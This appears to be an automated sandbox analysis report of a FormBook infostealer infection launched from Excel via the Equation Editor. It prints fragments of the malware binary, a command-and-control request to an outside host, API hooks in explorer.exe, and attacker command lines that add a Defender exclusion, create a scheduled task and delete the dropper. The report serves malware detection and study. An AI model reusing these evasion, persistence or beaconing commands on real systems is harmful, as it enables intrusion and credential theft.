                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0a0~ @ `@,O @ H.text `.rsrc @@.reloc@@B`HH!\js}s }(!({o"*0(}-}+T{o#o$,{o#o%}+(s&}{o#{o'({,6{o(+()((*-o*{o+{o,o-}*0){(.t|(+3*0){(0t|(+3*0{o#
                                    Nov 25, 2021 19:29:21.195287943 CET3INData Raw: 00 00 0a 28 31 00 00 0a 02 7b 03 00 00 04 6f 23 00 00 0a 28 32 00 00 0a 0a 06 72 01 00 00 70 28 33 00 00 0a 28 34 00 00 0a 16 73 35 00 00 0a 0b 02 7b 02 00 00 04 6f 28 00 00 0a 0c 38 89 00 00 00 12 02 28 29 00 00 0a 0d 07 09 6f 77 02 00 06 6f 36
                                    Data Ascii: (1{o#(2rp(3(4s5{o(8()owo6 o7ovo6ouo+5o o7{-o6+{o8o6o-,oo9(*:ko,o*
                                    Nov 25, 2021 19:29:21.195300102 CET4INData Raw: 00 0a 25 02 7b 09 00 00 04 6f 53 00 00 0a 6f 54 00 00 0a 25 07 6f 55 00 00 0a 1e 58 6f 56 00 00 0a 25 07 6f 57 00 00 0a 1e 58 6f 58 00 00 0a 7d af 01 00 04 06 7b af 01 00 04 6f 2c 00 00 0a 07 6f 59 00 00 0a 07 1a 6f 5a 00 00 0a 07 1a 6f 5b 00 00
                                    Data Ascii: %{oSoT%oUXoV%oWXoX}{o,oYoZo[s\o]{{{o^{o,{oY*x0#}s{,{o*0K{,{-*
                                    Nov 25, 2021 19:29:21.195312023 CET5INData Raw: 0a 6f 2c 00 00 0a 02 7b 12 00 00 04 6f 59 00 00 0a 02 7b 0d 00 00 04 6f 6c 00 00 0a 6f 2c 00 00 0a 02 7b 13 00 00 04 6f 59 00 00 0a 02 7b 0d 00 00 04 16 6f 86 00 00 0a 02 7b 0d 00 00 04 6f 6d 00 00 0a 6f 2c 00 00 0a 02 7b 09 00 00 04 6f 59 00 00
                                    Data Ascii: o,{oY{olo,{oY{o{omo,{oY{ hsroP{ o{o{os{Tsoop{rpoq{VGsroP{o{o{
                                    Nov 25, 2021 19:29:21.430346966 CET7INData Raw: 00 00 1b 30 04 00 5b 00 00 00 06 00 00 11 02 28 9d 00 00 0a 02 03 7d 17 00 00 04 02 16 7d 18 00 00 04 02 03 6f 77 02 00 06 03 6f 78 02 00 06 5a 03 6f 76 02 00 06 03 6f 78 02 00 06 5a 73 4d 00 00 0a 28 1d 00 00 06 02 28 1c 00 00 06 28 46 00 00 0a
                                    Data Ascii: 0[(}}owoxZovoxZsM(((Fot,o*EP0(oooC[(oooC[(oo(,!((-}}*o
                                    Nov 25, 2021 19:29:21.430375099 CET8INData Raw: 06 07 6f f0 01 00 06 0c 28 10 01 00 06 6f 01 01 00 06 08 6f 9b 02 00 06 2a 1e 02 7b 21 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 00 00 1b 30 04 00 cd 00 00 00 0f 00 00 11 02 28 9d 00 00 0a 02 03 6f 77 02 00 06 7d 1e 00 00 04 02 03 6f 76 02 00 06 7d
                                    Data Ascii: o(oo*{!*"}!*0(ow}ov}{{s}ouo+$o{{{{(o-,oowoxZovoxZsM((('(Fot,
                                    Nov 25, 2021 19:29:21.430387974 CET10INData Raw: 00 0a 2a 1e 02 7b 25 00 00 04 2a 22 02 03 7d 25 00 00 04 2a 1e 02 7b 26 00 00 04 2a 22 02 03 7d 26 00 00 04 2a 00 13 30 03 00 8f 00 00 00 14 00 00 11 02 28 9d 00 00 0a 02 03 72 63 02 00 70 28 bf 00 00 0a 6f c0 00 00 0a 28 3d 00 00 06 03 72 6d 02
                                    Data Ascii: *{%*"}%*{&*"}&*0(rcp(o(=rmp(o,^r{p(o-((?+o(4(((?(>oAs(*2(>o*{**"}**0}'
                                    Nov 25, 2021 19:29:21.430401087 CET11INData Raw: 00 04 02 73 66 00 00 0a 7d 30 00 00 04 02 7b 2f 00 00 04 6f 6b 00 00 0a 02 7b 30 00 00 04 6f 6b 00 00 0a 02 7b 30 00 00 04 6f 6c 00 00 0a 6f 6a 00 00 0a 02 7b 30 00 00 04 6f 6d 00 00 0a 6f 6a 00 00 0a 02 7b 30 00 00 04 6f 6a 00 00 0a 02 28 6a 00
                                    Data Ascii: sf}0{/ok{0ok{0oloj{0omoj{0oj(j{.on{.o{.soop{.rpoq{. TsroP{.o{.os{.Qs\o{/on{/soop
                                    Nov 25, 2021 19:29:21.430416107 CET12INData Raw: 6f 13 00 00 0a 2d e1 de 0a 06 2c 06 06 6f 12 00 00 0a dc 2a 00 00 01 10 00 00 02 00 60 00 23 83 00 0a 00 00 00 00 36 02 04 6f f1 00 00 0a 28 68 00 00 06 2a 00 00 1b 30 01 00 2e 00 00 00 1b 00 00 11 02 28 62 00 00 06 6f ed 00 00 0a 0a 2b 0b 06 6f
                                    Data Ascii: o-,o*`#6o(h*0.(bo+ooo-,o*#(f*~{4oiso*F(_,(j*Z{2,{2o*z,{6,{6o(*2
                                    Nov 25, 2021 19:29:21.430432081 CET14INData Raw: 54 01 00 00 20 f1 00 00 00 73 72 00 00 0a 28 95 00 00 0a 02 28 2c 00 00 0a 02 7b 45 00 00 04 6f 59 00 00 0a 02 1c 28 96 00 00 0a 02 72 4d 03 00 70 28 71 00 00 0a 02 72 65 03 00 70 6f 78 00 00 0a 02 02 fe 06 85 00 00 06 73 5c 00 00 0a 28 06 01 00
                                    Data Ascii: T sr((,{EoY(rMp(qrepoxs\((*(*{Q*}Q({U{Q.+o*F{bo(*J{b(o*F{Xoo*6{Xo*F{Yoo*6{Yo
                                    Nov 25, 2021 19:29:21.430449009 CET15INData Raw: 00 00 04 02 7b 5c 00 00 04 6f 6b 00 00 0a 02 7b 5d 00 00 04 6f 6b 00 00 0a 02 7b 62 00 00 04 6f 6b 00 00 0a 02 28 6a 00 00 0a 02 7b 54 00 00 04 17 6f 8e 00 00 0a 02 7b 54 00 00 04 1f 0f 1f 0c 73 6f 00 00 0a 6f 70 00 00 0a 02 7b 54 00 00 04 72 79
                                    Data Ascii: {\ok{]ok{bok(j{To{Tsoop{Trypoq{TGsroP{Tos{TrIpox{Uo{Uo#%rgp%rpo"{U\soop{Urpoq{URsroP


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    1192.168.2.224916752.128.23.15380C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Nov 25, 2021 19:30:53.961179972 CET760OUTGET /g2fg/?hZlpd=H/0ZmZGK5jsRiriaZut4CEFQpFY2p/TAFyTzOdFvzC4udK1/lSWrgm9fn/kzXoflvKU/jw==&LRgXx=fbcXTtnx6x HTTP/1.1
                                    Host: www.metafirstclass.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Nov 25, 2021 19:30:54.116276979 CET760INHTTP/1.1 463
                                    Server: nginx
                                    Date: Thu, 25 Nov 2021 18:30:54 GMT
                                    Content-Type: text/html
                                    Content-Length: 8915
                                    Connection: close
                                    ETag: "5e52d3ca-22d3"
                                    X-DIS-Request-ID: 9ab6992f058f33df87d2e92199f1ec19
                                    Set-Cookie: dis-remote-addr=84.17.52.63
                                    Set-Cookie: dis-timestamp=2021-11-25T10:30:54-08:00
                                    Set-Cookie: dis-request-id=9ab6992f058f33df87d2e92199f1ec19
                                    X-Frame-Options: sameorigin
                                    Nov 25, 2021 19:30:54.116292000 CET762INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f
                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"
                                    Nov 25, 2021 19:30:54.116306067 CET763INData Raw: 6e 73 5f 73 70 61 63 65 72 2e 70 6e 67 22 20 61 6c 74 3d 22 22 20 77 69 64 74 68 3d 22 31 38 22 20 68 65 69 67 68 74 3d 22 31 38 22 20 2f 3e 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 22 31 38 22 3e 3c 69 6d 67 20 73 72
                                    Data Ascii: ns_spacer.png" alt="" width="18" height="18" /></td> <td width="18"><img src="/DOAError/assets/images/bottom_trans_spacer.png" alt="" width="18" height="18" /></td> </tr> <tr> <td width="18"><img src="/DOAError/assets/i
                                    Nov 25, 2021 19:30:54.116322994 CET764INData Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 20 20 20 3c 2f 74 61 62 6c 65 3e 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 22 31 38 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 44 4f 41 45 72 72 6f 72 2f 61 73
                                    Data Ascii: > </tr> </table></td> <td width="18"><img src="/DOAError/assets/images/bottom_trans_spacer.png" width="18" height="55" /></td> </tr> <tr> <td width="18"><img src="/DOAError/assets/images/bottom_trans_spa
                                    Nov 25, 2021 19:30:54.116336107 CET766INData Raw: 70 6e 67 22 20 77 69 64 74 68 3d 22 31 30 22 20 68 65 69 67 68 74 3d 22 31 32 30 22 20 61 6c 74 3d 22 22 2f 3e 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 22 35 30 30 22 20
                                    Data Ascii: png" width="10" height="120" alt=""/></td> <td width="500" align="center" class="errortitle">463</td> <td width="109" align="center"><img src="/DOAError/assets/images/bottom_trans_spacer.png" width
                                    Nov 25, 2021 19:30:54.116368055 CET767INData Raw: 69 6d 61 67 65 74 65 78 74 22 3e 48 6f 73 74 3c 62 72 20 2f 3e 0d 0a 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 78 2d 73 6d 61 6c 6c 22 20 69 64 3d 22 68 6f 73 74 32 22 3e 3c 2f 73 70 61 6e 3e 3c 73 63 72 69 70 74 3e
                                    Data Ascii: imagetext">Host<br /><span style="font-size: x-small" id="host2"></span><script>function myFunction2() { var x = location.host; document.getElementById("host2").innerHTML = x;}</script></td> </tr>
                                    Nov 25, 2021 19:30:54.116385937 CET768INData Raw: 67 6e 3d 22 63 65 6e 74 65 72 22 3e 7c 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 22 33 30 25 22 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22
                                    Data Ascii: gn="center">|</td> <td width="30%" align="center"><table border="0" cellpadding="0" cellspacing="0"> <tbody> <tr> <td nowrap="nowrap"><div id="idtext"> Your IP Add
                                    Nov 25, 2021 19:30:54.116401911 CET769INData Raw: 20 20 20 20 20 3c 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 61 6c 69 67 6e 3d 22 6c 65 66 74 22 20 76 61 6c 69 67 6e 3d 22 74 6f 70 22 3e 3c 70 20 63 6c 61 73 73 3d 22 62 6f 64 79 74 65 78 74 22 3e 3c 73 74 72 6f 6e 67 3e 34 36 33
                                    Data Ascii: <tr> <td align="left" valign="top"><p class="bodytext"><strong>463 Restricted Client: </strong>This resource is not available for access by your client software. This request has been blocked. Please retry your request from a


                                    Code Manipulations

                                    User Modules

                                    Hook Summary

                                    Function NameHook TypeActive in Processes
                                    PeekMessageAINLINEexplorer.exe
                                    PeekMessageWINLINEexplorer.exe
                                    GetMessageWINLINEexplorer.exe
                                    GetMessageAINLINEexplorer.exe

                                    Processes

                                    Process: explorer.exe, Module: USER32.dll
                                    Function NameHook TypeNew Data
                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xEB
                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xEB
                                    GetMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xEB
                                    GetMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xEB

                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    Analysis Process: EXCEL.EXE PID: 2408 Parent PID: 596

                                    General

                                    Start time:19:28:14
                                    Start date:25/11/2021
                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                    Imagebase:0x13f1a0000
                                    File size:28253536 bytes
                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Chronological Activities

                                    Analysis Process: EQNEDT32.EXE PID: 1268 Parent PID: 596

                                    General

                                    Start time:19:28:36
                                    Start date:25/11/2021
                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                    Imagebase:0x400000
                                    File size:543304 bytes
                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Chronological Activities

                                    Analysis Process: vbc.exe PID: 3028 Parent PID: 1268

                                    General

                                    Start time:19:28:41
                                    Start date:25/11/2021
                                    Path:C:\Users\Public\vbc.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\Public\vbc.exe"
                                    Imagebase:0x80000
                                    File size:723456 bytes
                                    MD5 hash:0F88779E9500075DE85E916637305164
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.473128964.00000000023E1000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Antivirus matches:
                                    • Detection: 50%, ReversingLabs
                                    Reputation:low

                                    Chronological Activities

                                    Analysis Process: powershell.exe PID: 2728 Parent PID: 3028

                                    General

                                    Start time:19:28:43
                                    Start date:25/11/2021
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe
                                    Imagebase:0x21f30000
                                    File size:452608 bytes
                                    MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Reputation:high

                                    Chronological Activities

                                    Analysis Process: schtasks.exe PID: 2636 Parent PID: 3028

                                    General

                                    Start time:19:28:44
                                    Start date:25/11/2021
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp
                                    Imagebase:0x150000
                                    File size:179712 bytes
                                    MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Chronological Activities

                                    Analysis Process: vbc.exe PID: 1724 Parent PID: 3028

                                    General

                                    Start time:19:28:45
                                    Start date:25/11/2021
                                    Path:C:\Users\Public\vbc.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\Public\vbc.exe
                                    Imagebase:0x80000
                                    File size:723456 bytes
                                    MD5 hash:0F88779E9500075DE85E916637305164
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    Chronological Activities

                                    Analysis Process: explorer.exe PID: 1764 Parent PID: 1724

                                    General

                                    Start time:19:28:50
                                    Start date:25/11/2021
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Explorer.EXE
                                    Imagebase:0xffa10000
                                    File size:3229696 bytes
                                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high

                                    Chronological Activities

                                    Analysis Process: rundll32.exe PID: 1292 Parent PID: 1764

                                    General

                                    Start time:19:29:01
                                    Start date:25/11/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe
                                    Imagebase:0xd80000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high

                                    Chronological Activities

                                    Analysis Process: cmd.exe PID: 2964 Parent PID: 1292

                                    General

                                    Start time:19:29:07
                                    Start date:25/11/2021
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c del "C:\Users\Public\vbc.exe"
                                    Imagebase:0x49dc0000
                                    File size:302592 bytes
                                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Chronological Activities

                                    Disassembly

                                    Code Analysis

                                    Reset < >

                                      Analysis Process: vbc.exe PID: 3028 Parent PID: 1268 vbc.exeCOMMON

                                      Executed Functions

                                      Function 022C00E7, Relevance: 2.6, Strings: 2, Instructions: 113COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.473110185.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: +$-
                                      • API String ID: 0-2137968064
                                      • Opcode ID: 7817c76bd24b1007a090c91602ad7e4f838c71e1c71d30cb679c4fbd76183b7f
                                      • Instruction ID: c3e2f6d901adb26cb78eaae62835d69d11c74285f6ce43c779fb80f2222ae73d
                                      • Opcode Fuzzy Hash: 7817c76bd24b1007a090c91602ad7e4f838c71e1c71d30cb679c4fbd76183b7f
                                      • Instruction Fuzzy Hash: 8851DF74C5522ACFEB30DF64C949BE9BBB0AB05304F1096EAD519AB294E7B44BC4CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 022C0776, Relevance: 2.6, Strings: 2, Instructions: 87COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.473110185.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: ($-
                                      • API String ID: 0-2099803033
                                      • Opcode ID: db1b6e0911a2266e29ea371fc7c03a1790177defa027470c410c95a0a4db1449
                                      • Instruction ID: 903ae7dbd94e7bbb52d2daf1c38b8f53422e0cb35b5fbdff037d26dcc1c0d39e
                                      • Opcode Fuzzy Hash: db1b6e0911a2266e29ea371fc7c03a1790177defa027470c410c95a0a4db1449
                                      • Instruction Fuzzy Hash: 78411F7095522DCFDB24CFA8D988BECB7B4AB49304F2082EAD509A7290D7709EC5CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 022C0CDB, Relevance: 2.6, Strings: 2, Instructions: 59COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.473110185.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: $-
                                      • API String ID: 0-1933255201
                                      • Opcode ID: 4472b1f34c235a0145b986a8b42f6e0feaabce1c67b05f4f5fa4efb13da91969
                                      • Instruction ID: e8b927e5ba0711b47f5af7018fac5886101e3c4d87eb82a468cd11bd6387fae1
                                      • Opcode Fuzzy Hash: 4472b1f34c235a0145b986a8b42f6e0feaabce1c67b05f4f5fa4efb13da91969
                                      • Instruction Fuzzy Hash: AC31BE7495522ACBEB20DFA8C948BEDB7B4BB08304F1082EAD509A7284D7709E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 022C0B76, Relevance: 2.6, Strings: 2, Instructions: 57COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.473110185.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: ,$-
                                      • API String ID: 0-2049039173
                                      • Opcode ID: 980846d5dba339e0fc456a0d92c1334793306de1d24163380fa8d8c7f5b533cc
                                      • Instruction ID: aeb6360a67b997d933632ae589e23b0485b671c5644e16725fb2536ea8a0549b
                                      • Opcode Fuzzy Hash: 980846d5dba339e0fc456a0d92c1334793306de1d24163380fa8d8c7f5b533cc
                                      • Instruction Fuzzy Hash: 5C21B27495422ECFEB20CFA4C948BECBBB4BB08305F1082EAD409AB294D7744AC5DF40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 002FC578, Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002FC83F
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472554526.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: fab84583ea85b9bebba66740211bcac517804d7ed502ae1481f3e45b550234ca
                                      • Instruction ID: d0b802495f6490494c0de4da6ba648e2cb761f4c92d0dc3f9b2ddff7405a32dc
                                      • Opcode Fuzzy Hash: fab84583ea85b9bebba66740211bcac517804d7ed502ae1481f3e45b550234ca
                                      • Instruction Fuzzy Hash: 7CC13571D0422D8FCB20DFA4C941BEDBBB1BF49304F1095A9E919B7240EB749A99CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 002FC1E0, Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002FC2B3
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.472554526.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      • Opcode ID: 62c3f11985f9146e1f218a02479e63ecaa2a762ef5d4df9e0331b55a730f966b
                                      • Instruction ID: e72dc7f6cc94ac2f3b41d96476da7e706812a49651278c2613f8e041eb9af18e
                                      • Opcode Fuzzy Hash: 62c3f11985f9146e1f218a02479e63ecaa2a762ef5d4df9e0331b55a730f966b
                                      • Instruction Fuzzy Hash: 9A41AAB4D0525C9FCF00CFA9D984AEEFBB1BB49304F20942AE915B7200D775AA55CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 002FC340, Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                      Download Yara Rule
                                      APIs
